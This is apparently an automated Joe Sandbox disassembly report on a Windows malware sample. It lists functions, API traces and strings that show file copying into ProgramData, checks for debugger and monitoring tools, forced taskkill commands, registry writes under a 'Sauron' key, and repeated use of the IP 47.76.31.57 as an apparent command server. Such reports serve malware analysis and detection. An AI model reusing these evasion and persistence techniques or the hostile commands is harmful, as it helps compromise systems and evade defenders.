@, xrefs: 004105E1

Memory Dump Source

Source File: 00000007.00000002.3502521914.0000000000410000.00000040.00001000.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_lXAMaI.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3d2a8faf5887d288708f3b463a02c5df1b11905f00bb573fae50a869093c4fd9
Instruction ID: 4c4eca4c5ca1e370ed9d7c6b4af94303e027b1e73fd2cc44d3b758daee05be44
Opcode Fuzzy Hash: 3d2a8faf5887d288708f3b463a02c5df1b11905f00bb573fae50a869093c4fd9
Instruction Fuzzy Hash: F222BE74E05209DFCB18CF88C590BEDBBB2BF88304F24819AD415AB385C774AA96DF54

Function 10001789 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001870
recv.WS2_32(?,?,0000C800,00000000), ref: 100018D0

Strings

@, xrefs: 100017FE

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: recvselect
String ID: @
API String ID: 741273618-2766056989
Opcode ID: da77e0d91ef752291443a25e089e3d11a8ff226ac3166d84cfb3fce1cbbebd8e
Instruction ID: 7e1601aa2df6b652fdd30f16dd71b41f648469b132ebe0993671a182fd3abebf
Opcode Fuzzy Hash: da77e0d91ef752291443a25e089e3d11a8ff226ac3166d84cfb3fce1cbbebd8e
Instruction Fuzzy Hash: D0410934A0112C9EFB24DB14CC95FD9B3B6EB44384F2483D9D90966284DB747E818F95

Function 02DE36B0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(00000000,?,?,?), ref: 02DE3738

Memory Dump Source

Source File: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 15124915fadfe72062ff369543c5ffb448f6125f54135d317c7b70bf5f661b80
Instruction ID: c53f9967a63c91170aa137f1bbc0179fb9702b522297272bac83a3b57cb4b109
Opcode Fuzzy Hash: 15124915fadfe72062ff369543c5ffb448f6125f54135d317c7b70bf5f661b80
Instruction Fuzzy Hash: 2911B6B16092455BDA60FB24AC42BFBB7DCEF85364F40056DF995C7280E735AD04CBA2

Function 1000A1A7 Relevance: 117.5, APIs: 34, Strings: 33, Instructions: 282
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

CopyFileA.KERNEL32(C:\xx.exe,C:\ProgramData\xxxx\xxx.exe,00000000), ref: 1000A245
CopyFileA.KERNEL32(C:\ProgramData\xxxx\xxx.exe,C:\xx.exe,00000000), ref: 1000A26D
CopyFileA.KERNEL32(C:\ProgramData\Microsoft\xxxxxxxx.dat,C:\Microsoft\iXXX3XXX.dat,00000000), ref: 1000A295
Sleep.KERNEL32(000001F4), ref: 1000A2A0

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431

CopyFileA.KERNEL32(C:\Microsoft\iXXX3XXX.dat,C:\ProgramData\Microsoft\xxxxxxxx.dat,00000000), ref: 1000A2D7
Sleep.KERNEL32(000001F4), ref: 1000A2E2

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000080,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002442

EnumWindows.USER32(10009A20,00000000), ref: 1000A2FE
EnumWindows.USER32(10008F49,00000000), ref: 1000A3BF
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000A3DC
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000A3F6
ExitProcess.KERNEL32 ref: 1000A3FE

Strings

taskkill /im rundll3222.exe /f & exit, xrefs: 1000A435
C:\xx.exe, xrefs: 1000A263
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000A225
C:\ProgramData\Microsoft\xxxxxxxx.dat, xrefs: 1000A2EA
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000A218
PowerTool, xrefs: 1000A35E
C:\ProgramData\Microsoft\xxxxxxxx.dat, xrefs: 1000A290
XueTr, xrefs: 1000A316
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000A1D5
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A275
open, xrefs: 1000A3EF
taskkill /im rundll32222.exe /f & exit, xrefs: 1000A453
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000A23B
rundll32222.exe, xrefs: 1000A440
C:\ProgramData\xxx.rar, xrefs: 1000A213
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000A268
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A2D2
C:\xx.exe, xrefs: 1000A240
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A2A8
C:\xx.exe, xrefs: 1000A24D
taskkill /im rundll322.exe /f & exit, xrefs: 1000A417
OllyDbg, xrefs: 1000A33A
C:\ProgramData\Microsoft\xxxxxxxx.dat, xrefs: 1000A2CD
c32asm, xrefs: 1000A328
C:\ProgramData\xxx.rar, xrefs: 1000A1F0
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A28B
C:\ProgramData\xxx.rar, xrefs: 1000A1FD
C:\tzfz, xrefs: 1000A1BF
rundll322.exe, xrefs: 1000A404
rundll3222.exe, xrefs: 1000A422
C:\ProgramData\Microsoft\xxxxxxxx.dat, xrefs: 1000A2B7
Process Monitor, xrefs: 1000A34C
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000A1EB

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Copy$Attributes$EnumSleepWindows$ErrorExecuteExitLastModuleNameProcessShell
String ID: C:\Microsoft\iXXX3XXX.dat$C:\Microsoft\iXXX3XXX.dat$C:\Microsoft\iXXX3XXX.dat$C:\Microsoft\iXXX3XXX.dat$C:\ProgramData\Microsoft\xxxxxxxx.dat$C:\ProgramData\Microsoft\xxxxxxxx.dat$C:\ProgramData\Microsoft\xxxxxxxx.dat$C:\ProgramData\Microsoft\xxxxxxxx.dat$C:\ProgramData\xxx.rar$C:\ProgramData\xxx.rar$C:\ProgramData\xxx.rar$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\tzfz$C:\xx.exe$C:\xx.exe$C:\xx.exe$OllyDbg$PowerTool$Process Monitor$XueTr$c32asm$open$rundll322.exe$rundll3222.exe$rundll32222.exe$taskkill /im rundll322.exe /f & exit$taskkill /im rundll3222.exe /f & exit$taskkill /im rundll32222.exe /f & exit
API String ID: 1126424455-4008026636
Opcode ID: 30e31dc11bf494aef743c371519b0c4c9e54d83020397694855f7a22e85f583f
Instruction ID: 2a3a1193ea46f9cdb074d0de2300cde8ae4962c9cfb9291f97f52882341ab4ae
Opcode Fuzzy Hash: 30e31dc11bf494aef743c371519b0c4c9e54d83020397694855f7a22e85f583f
Instruction Fuzzy Hash: A7A1C775980214BBF710EBE09C4EFED3A60FB08752F300274FB09E51D5DBB166958A6A

Function 100077DD Relevance: 52.6, APIs: 4, Strings: 26, Instructions: 139
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 10007915
GetLocalTime.KERNEL32(?), ref: 10007925
wsprintfA.USER32 ref: 10007A3A
lstrlenA.KERNEL32(00000000,00000000), ref: 10007A8B

Part of subcall function 1001138A: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100113B9
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCreateKeyExA), ref: 100113CB
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 100113DD
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteKeyA), ref: 100113EF
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteValueA), ref: 10011401
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 10011413
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011425

Strings

t, xrefs: 1000785B
e, xrefs: 100078D9
r, xrefs: 1000787E
r, xrefs: 100078BD
s, xrefs: 100078E0
%, xrefs: 100078EE
i, xrefs: 100078CB
e, xrefs: 1000789A
\, xrefs: 100078E7
MarkTime, xrefs: 10007A9B, 10007AA1
\, xrefs: 100078A8
S, xrefs: 10007893
t, xrefs: 100078A1
e, xrefs: 100078B6
v, xrefs: 100078C4
s, xrefs: 100078F5
n, xrefs: 10007870
S, xrefs: 100078AF
C, xrefs: 10007862
SOFTWARE\%s, xrefs: 10007907, 1000790D
o, xrefs: 10007869
%4d-%.2d-%.2d %.2d:%.2d, xrefs: 10007A2C, 10007A32
o, xrefs: 10007885
t, xrefs: 10007877
l, xrefs: 1000788C
c, xrefs: 100078D2

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$wsprintf$LibraryLoadLocalTimelstrlen
String ID: %$%4d-%.2d-%.2d %.2d:%.2d$C$MarkTime$S$S$SOFTWARE\%s$\$\$c$e$e$e$i$l$n$o$o$r$r$s$s$t$t$t$v
API String ID: 1449506856-2538628928
Opcode ID: 3f13fecea9d2e5d17ee00049d6f3988ea6e44a7f5a2e1c16df30ec5ad5edead2
Instruction ID: 118a684eb5cec1c3ce135c216b390a6fc98426e52efd7593b3da9727f2bca61c
Opcode Fuzzy Hash: 3f13fecea9d2e5d17ee00049d6f3988ea6e44a7f5a2e1c16df30ec5ad5edead2
Instruction Fuzzy Hash: 0481DD30808AE8C9EB26C628DC597DBBFB55F16349F0441D9D18C66282C7FA1BD8CF65

Function 1000BE89 Relevance: 45.1, APIs: 1, Strings: 29, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 1000BF78

Part of subcall function 10011039: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100110B4
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 100110CC
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100110E1
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100110F6
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1001110B
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011120
Part of subcall function 10011039: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 10011149
Part of subcall function 10011039: FreeLibrary.KERNEL32(00000000), ref: 10011354

Strings

c, xrefs: 1000BF4C
v, xrefs: 1000BF44
e, xrefs: 1000BF50
t, xrefs: 1000BF18
SOFTWARE\%s, xrefs: 1000BF6D, 1000BF70
e, xrefs: 1000BF2C
l, xrefs: 1000BF24
s, xrefs: 1000BF54
S, xrefs: 1000BF28
C, xrefs: 1000BF0C
lSet\Services\%s, xrefs: 1000BEAC
vices\%s, xrefs: 1000BF8F, 1000BF92
\Services\%s, xrefs: 1000BF89, 1000BF8C
S, xrefs: 1000BF38
Sauron, xrefs: 1000BF68
o, xrefs: 1000BF20
s, xrefs: 1000BF60
n, xrefs: 1000BF14
lSet\Services\%s, xrefs: 1000BF83, 1000BF86
e, xrefs: 1000BF3C
o, xrefs: 1000BF10
%, xrefs: 1000BF5C
i, xrefs: 1000BF48
t, xrefs: 1000BF08
\, xrefs: 1000BF34
r, xrefs: 1000BF1C
t, xrefs: 1000BF30
r, xrefs: 1000BF40
\, xrefs: 1000BF58

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadOpenwsprintf
String ID: %$C$S$S$SOFTWARE\%s$Sauron$\$\$\Services\%s$c$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$o$o$r$r$s$s$t$t$t$v$vices\%s
API String ID: 4113823538-1960001803
Opcode ID: a36dea8535d48370430b67b3a4ea14b253bff2b1cd2d97d760cb56fa4116ce19
Instruction ID: 5ff9c2667670290a62377e3c320e7918edcc00a281114f4e0d152dbd142481fc
Opcode Fuzzy Hash: a36dea8535d48370430b67b3a4ea14b253bff2b1cd2d97d760cb56fa4116ce19
Instruction Fuzzy Hash: A041F250D0C2C9D9FB01C6A8C8197EFBFB55B26748F0840D8D6843A282C6FB575887BA

Function 10007BBD Relevance: 42.1, APIs: 2, Strings: 26, Instructions: 72
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 10007C83
lstrlenA.KERNEL32(1004E0E6,00000000), ref: 10007C93

Part of subcall function 1001138A: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100113B9
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCreateKeyExA), ref: 100113CB
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 100113DD
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteKeyA), ref: 100113EF
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteValueA), ref: 10011401
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 10011413
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011425

Strings

e, xrefs: 10007C5C
r, xrefs: 10007C28
t, xrefs: 10007C14
s, xrefs: 10007C60
\, xrefs: 10007C40
S, xrefs: 10007C44
r, xrefs: 10007C4C
o, xrefs: 10007C1C
v, xrefs: 10007C50
\, xrefs: 10007C64
c, xrefs: 10007C58
SOFTWARE\%s, xrefs: 10007C78, 10007C7B
S, xrefs: 10007C34
e, xrefs: 10007C38
%, xrefs: 10007C68
t, xrefs: 10007C3C
e, xrefs: 10007C48
i, xrefs: 10007C54
l, xrefs: 10007C30
s\%s, xrefs: 10007C74, 10007C77
s, xrefs: 10007C6C
C, xrefs: 10007C18
Remarkbeizhu, xrefs: 10007CA1
n, xrefs: 10007C20
o, xrefs: 10007C2C
t, xrefs: 10007C24

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadlstrlenwsprintf
String ID: %$C$Remarkbeizhu$S$S$SOFTWARE\%s$\$\$c$e$e$e$i$l$n$o$o$r$r$s$s$s\%s$t$t$t$v
API String ID: 2349312171-2138845655
Opcode ID: 9ae0ceee86c8c7a21d567dc5ab177b79ba944162ea3aec2d0e17adeb72b4228f
Instruction ID: e2f2c4827d6e0cc4f77a6d1f96b512ea736445a0291084f37b4d419b4fbcfaf1
Opcode Fuzzy Hash: 9ae0ceee86c8c7a21d567dc5ab177b79ba944162ea3aec2d0e17adeb72b4228f
Instruction Fuzzy Hash: 0E31CF10D0C6C9D9FB12C6A8C8187DEBFB55B26349F0840D8D5983A282C7FF175887BA

Function 10007CD8 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 287
stringsynchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 10007D04
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10007D18
GetLastError.KERNEL32 ref: 10007D2D
ReleaseMutex.KERNEL32(00000000), ref: 10007D41
CloseHandle.KERNEL32(00000000), ref: 10007D4E
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 10007DB3
_rand.LIBCMT ref: 10007E2B
Sleep.KERNEL32(00000BB8), ref: 10007E38
lstrcatA.KERNEL32(?,?), ref: 10007F87
lstrcatA.KERNEL32(00000000,47.76.31.57), ref: 10007FBC
strcmp.MSVCRT ref: 10007FCE
GetTickCount.KERNEL32 ref: 10007FE4
GetTickCount.KERNEL32 ref: 10008018
lstrcpyA.KERNEL32(47.76.31.57,?,?,?,?,00000000), ref: 10008061
WaitForSingleObject.KERNEL32(?,00000064,?,?), ref: 100080BE
Sleep.KERNEL32(000001F4,?,?), ref: 100080CF

Part of subcall function 100020C1: TerminateThread.KERNEL32(00000001,000000FF,?,?,?,?,?,?,?,?,?,000000FF), ref: 1000211C
Part of subcall function 100020C1: CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,000000FF), ref: 1000212D

Strings

%s:%d:%s, xrefs: 10007CF8
SOFTWARE\, xrefs: 10007D74
47.76.31.57, xrefs: 1000805C
Sauron, xrefs: 10007CE8, 10007D88, 10007DC8, 10007DDE, 10007DEB
47.76.31.57, xrefs: 10007CF3, 10007FB0

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CloseCountHandleMutexSleepTicklstrcat$CreateErrorLastObjectOpenReleaseSingleTerminateThreadWait_randlstrcpystrcmpwsprintf
String ID: %s:%d:%s$47.76.31.57$47.76.31.57$SOFTWARE\$Sauron
API String ID: 639425861-3614583848
Opcode ID: d46c007d3071258298bdb2a18fa3f0e3ecbdce1bda5ef922f9e8aaceea826bf6
Instruction ID: 19090ada38f8958307ba49c6740a06f20b651a115b2b16b43f09f85f0dbd84de
Opcode Fuzzy Hash: d46c007d3071258298bdb2a18fa3f0e3ecbdce1bda5ef922f9e8aaceea826bf6
Instruction Fuzzy Hash: 17C18A75D00258ABEB14DB64CC55BEEB7B4FF08344F5040A9E609A7291EB74AB88CF61

Function 10011039 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 225
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100110B4
GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 100110CC
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100110E1
GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100110F6
GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1001110B
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011120
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 10011149
FreeLibrary.KERNEL32(00000000), ref: 10011354

Strings

RegEnumValueA, xrefs: 100110EA
%08X, xrefs: 10011305
RegOpenKeyExA, xrefs: 100110D5
ADVAPI32.dll, xrefs: 100110AF
RegQueryValueExA, xrefs: 100110C0
RegEnumKeyExA, xrefs: 100110FF
RegCloseKey, xrefs: 10011114

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadOpen
String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 906421942-2913591164
Opcode ID: 472bf78fb22052f885b444a1b55843fe5d2ecd25e67d394831a8fba99cd850c8
Instruction ID: fd24ecfd2cfa4b09e9b54e95b928952d44ea11dbb4b88c72b487a46cd30e19e8
Opcode Fuzzy Hash: 472bf78fb22052f885b444a1b55843fe5d2ecd25e67d394831a8fba99cd850c8
Instruction Fuzzy Hash: 119100B5904218EBDB14DFA4CC89FEEB7B8FB48700F144199FA19A7280D7759A85CF60

Function 1001138A Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 183
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100113B9
GetProcAddress.KERNEL32(?,RegCreateKeyExA), ref: 100113CB
GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 100113DD
GetProcAddress.KERNEL32(?,RegDeleteKeyA), ref: 100113EF
GetProcAddress.KERNEL32(?,RegDeleteValueA), ref: 10011401
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 10011413
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011425
RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,?,000000FF), ref: 1001146C
RegOpenKeyExA.KERNEL32(?,00000001,00000000,0002001F,?), ref: 1001148B
lstrlenA.KERNEL32(80000001), ref: 100114BA
RegSetValueExA.KERNEL32(?,?,00000000,?,80000001,-00000001), ref: 100114D6
FreeLibrary.KERNEL32(00000000), ref: 10011597

Strings

RegCloseKey, xrefs: 1001141C
ADVAPI32.dll, xrefs: 100113B4
RegOpenKeyExA, xrefs: 1001140A
RegCreateKeyExA, xrefs: 100113C2
RegSetValueExA, xrefs: 100113D4
RegDeleteValueA, xrefs: 100113F8
RegDeleteKeyA, xrefs: 100113E6

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CreateFreeLoadOpenValuelstrlen
String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
API String ID: 3458221994-3188892968
Opcode ID: ef45f7d8f71b84302aedcb5a489e2e50873ef8f83856bffd12afcbe4b4f28a15
Instruction ID: 1cec0723a98d7d1154d65f556dabfd79d9871bd6b94b567307ace6a96f5716f5
Opcode Fuzzy Hash: ef45f7d8f71b84302aedcb5a489e2e50873ef8f83856bffd12afcbe4b4f28a15
Instruction Fuzzy Hash: 9361DB75A00208EBDB14DF94DC85FEEBBB9FB88740F108519FA15AB290D774D985CB60

Function 1000C526 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 154
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 1000C547
lstrlenA.KERNEL32(?,00000000), ref: 1000C56C

Part of subcall function 10011039: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100110B4
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 100110CC
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100110E1
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100110F6
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1001110B
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011120
Part of subcall function 10011039: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 10011149
Part of subcall function 10011039: FreeLibrary.KERNEL32(00000000), ref: 10011354

